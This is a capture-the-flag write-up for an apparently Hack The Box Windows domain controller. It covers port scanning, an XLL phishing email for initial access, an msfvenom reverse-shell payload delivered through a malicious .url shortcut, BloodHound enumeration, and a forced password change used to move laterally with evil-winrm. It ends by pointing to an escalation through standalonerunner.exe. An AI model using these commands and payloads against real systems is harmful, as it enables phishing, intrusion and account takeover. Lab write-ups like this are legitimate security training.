This is a Windows 22 Server machine that hosts a web site under development. The developers have opened an email account where the users can send their suggestions in Excel format. We leverage this to send a malicious XLL phishing email, that enables us to get a first shell in the system. To get the user flag we move laterally to another user by means of another client side attack: placing a malicious .url shortcut in a folder used by the web developers team and waiting for someone to click on it. Regarding escalation, first we move laterally to another domain user abusing a misconfiguration in the Active Directory ForceChangePasswordobject permission. Final escalation step to administrator is made by abusing the Windows binary standalonerunner.exe
> nmap $target -p- --min-rate=5000 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-09 10:34 EDT
Nmap scan report for 10.10.11.21
Host is up, received user-set (0.042s latency).
Not shown: 65513 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
25/tcp open smtp syn-ack
53/tcp open domain syn-ack
80/tcp open http syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5985/tcp open wsman syn-ack
9389/tcp open adws syn-ack
49664/tcp open unknown syn-ack
59781/tcp open unknown syn-ack
59782/tcp open unknown syn-ack
59783/tcp open unknown syn-ack
59789/tcp open unknown syn-ack
59796/tcp open unknown syn-ack
59805/tcp open unknown syn-ack
Nmap done: 1 IP address (1 host up) scanned in 26.46 seconds
Enumerate the open ports.
> nmap $target -p25,53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sV -sC -Pn -vv
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-09 10:46 EDT
Nmap scan report for 10.10.11.21
Host is up, received user-set (0.040s latency).
Scanned at 2024-10-09 10:46:47 EDT for 56s
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack hMailServer smtpd
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-favicon: Unknown favicon MD5: FAF2C069F86E802FD21BF15DC8EDD2DC
|_http-title: Axlle Development
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-10-09 14:47:18Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack .NET Message Framing
Service Info: Host: MAINFRAME; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 29964/tcp): CLEAN (Timeout)
| Check 2 (port 22598/tcp): CLEAN (Timeout)
| Check 3 (port 59572/udp): CLEAN (Timeout)
| Check 4 (port 32412/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 25s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-10-09T14:47:29
|_ start_date: N/A
Nmap done: 1 IP address (1 host up) scanned in 56.75 seconds
Looks like a domain controller, add to hosts file and enumerate the web site with Firefox
They provide an email address to send email in Excel format, but they warn macros will be disabled, so we have to investigate ways to send payloads in Excel without using macros.
The answer is to use XLL payloads as explained in the following links.
As reverse shell for user axlle\gideon.hamill is received on port 1919.
Use this shell to enumerate the file system contents. In the location C:\Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2F, we find an email .eml file.
> cd C:\Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2F
> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/1/2024 10:03 PM App Development
d----- 1/1/2024 6:33 AM inetpub
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 6/13/2024 2:20 AM Program Files
d----- 6/13/2024 2:23 AM Program Files (x86)
d-r--- 1/1/2024 4:15 AM Users
d----- 6/13/2024 4:30 AM Windows
> cd "C:\Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2F"
> dir
Directory: C:\Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2F
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/1/2024 6:32 AM 997 {2F7523BD-628F-4359-913E-A873FCC59D0F}.eml
Let's browse its contents.
> type *
Return-Path: webdevs@axlle.htb
Received: from bumbag (Unknown [192.168.77.153])
by MAINFRAME with ESMTP
; Mon, 1 Jan 2024 06:32:24 -0800
Date: Tue, 02 Jan 2024 01:32:23 +1100
To: dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb
From: webdevs@axlle.htb
Subject: OSINT Application Testing
Message-Id: <20240102013223.019081@bumbag>
X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
Hi everyone,
The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal.
We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation.
Yours in click-worthy URLs,
The Web Dev Team
We have discovered the Web Dev group is expecting .url web shortcut files in the C:\inetpub\testing location.
Let's create an EXE payload with msfvenom and transfer it to C:\inetpub\testing
> msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.91 lport=9000 -f exe -a x64 --platform windows -o shell.exe
Now create a malicious .url shortcut pointing to this payload so we receive a reverse shell every time someone from the Web Dev team opens it. We transfer the shortcut to the same location.
Shortly after, a reverse shell for another Web Dev user axlle\dallon.matrix is received on port 9000.
You can use it to retrieve the user flag
SYSTEM
Start from the low-priv shell and take the opportunity to enumerate the system and the current user.
> systeminfo
Host Name: MAINFRAME
OS Name: Microsoft Windows Server 2022 Standard
OS Version: 10.0.20348 N/A Build 20348
System Type: x64-based PC
> net user dallon.matrix
User name dallon.matrix
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/13/2024 1:04:25 AM
Password expires Never
Password changeable 6/14/2024 1:04:25 AM
Password required Yes
User may change password Yes
Workstations allowed MAINFRAME
Logon script
User profile
Home directory
Last logon 10/9/2024 9:42:37 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Web Devs *Domain Users
The command completed successfully.
> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
There is nothing we can use for the moment. Let's do a domain enumeration with Bloodhound.
First transfer the sharphound.exe collector and gather the data.
> sharphound.exe --collectionmethods all
2024-10-09T09:57:04.0025209-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2024-10-09T09:57:04.1744044-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-10-09T09:57:04.2056804-07:00|INFORMATION|Initializing SharpHound at 9:57 AM on 10/9/2024
2024-10-09T09:57:04.3931446-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-10-09T09:57:04.5650426-07:00|INFORMATION|Beginning LDAP search for axlle.htb
2024-10-09T09:57:04.6118979-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-10-09T09:57:04.6118979-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-10-09T09:57:35.2838139-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2024-10-09T09:57:48.5650122-07:00|INFORMATION|Consumers finished, closing output channel
2024-10-09T09:57:48.5962640-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-10-09T09:57:48.7681444-07:00|INFORMATION|Status: 113 objects finished (+113 2.568182)/s -- Using 44 MB RAM
2024-10-09T09:57:48.7681444-07:00|INFORMATION|Enumeration finished in 00:00:44.2115548
2024-10-09T09:57:48.8618925-07:00|INFORMATION|Saving cache with stats: 72 ID to type mappings.
72 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-10-09T09:57:48.8618925-07:00|INFORMATION|SharpHound Enumeration Completed at 9:57 AM on 10/9/2024! Happy Graphing!
Transfer the resulting .zip file to Kali and ingest the data into the graph database. We see current user is member of web.devs group, which can in turn change password of user jacob.greeny
Then move laterally to user jacob.greeny with the recently changed password and evil-winrm
> evil-winrm -u jacob.greeny -p 'Password123!' -i axlle.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jacob.greeny\Documents>
Now we can move to the C:\App Development\kbfiltr folder and inspect the README.md file.
> type README.md
# Keyboard Translation Program
This is an application in development that uses a WDF kbfiltr as the basis for a translation program. The aim of this application is to allow users to program and simulate custom keyboard layouts for real or fictional languages.
## Features
- Create custom keyboard layouts for real or fictional languages.
- Simulate keyboard inputs using the custom layouts.
- Secret codes to switch between languages and logging output.
## Progress
- kbfiltr driver - Complete
- Keyboard mapping - Complete (hardcoded in driver)
- Custom mapping in application layer - In progress
- Logging - Complete
- Activation of logging - Complete
- Simulation of other keyboard layouts - Incomplete
- Activation of other keyboard layouts - Incomplete
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**
## Prerequisites
- Windows 10 or higher
- Visual Studio 2019
- Windows Driver Kit (WDK) 10
## Getting Started
- Clone this repository.
- Open the solution file in Visual Studio.
- Build the solution in Release mode.
- Install the driver by running `.\devcon.exe install .\kbfiltr.inf "*PNP0303"` as Administrator.
- Install the driver as an upperclass filter with `.\devcon.exe /r classfilter keyboard upper -keylogger` as Administrator.
- Install the application by running the install_app.bat file as Administrator.
- Reboot your computer to load the driver.
- Launch the application and start programming your custom keyboard layouts.
## Usage
### Programming a Custom Layout
- Launch the application.
- Click on the Program Layout button.
- Select the language for which you want to program the layout.
- Select the key you want to modify from the list.
- Modify the key's scancode and virtual key code as required.
- Repeat steps 4 and 5 for all the keys you want to modify.
- Save the layout by clicking on the Save Layout button.
### Simulating Inputs
- Launch the application.
- Click on the Simulate Input button.
- Select the language for which you want to simulate the input.
- Type in the input in the normal English layout.
- Trigger language switch as outlined below (when required).
- Verify that the input is translated to the selected language.
### Logging Output
- Launch the application.
- Turn on logging (shortcuts can be created as explained below)
- Use the application as normal.
- The log file will be created in the same directory as the application.
## Triggering/Activation
- To toggle logging output, set up a shortcut in the options menu. INCOMPLETE
- To switch to a different language, press the Left Alt key and the Right Ctrl key simultaneously. INCOMPLETE
## Bugs
There are probably several.
The author says:
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**
This standalonerunner.exe binary is a tool for testing and debugging drivers on Windows systems.
Doing a search in Internet we find an article published by a researcher who explains how to get command execution abusing this binary.
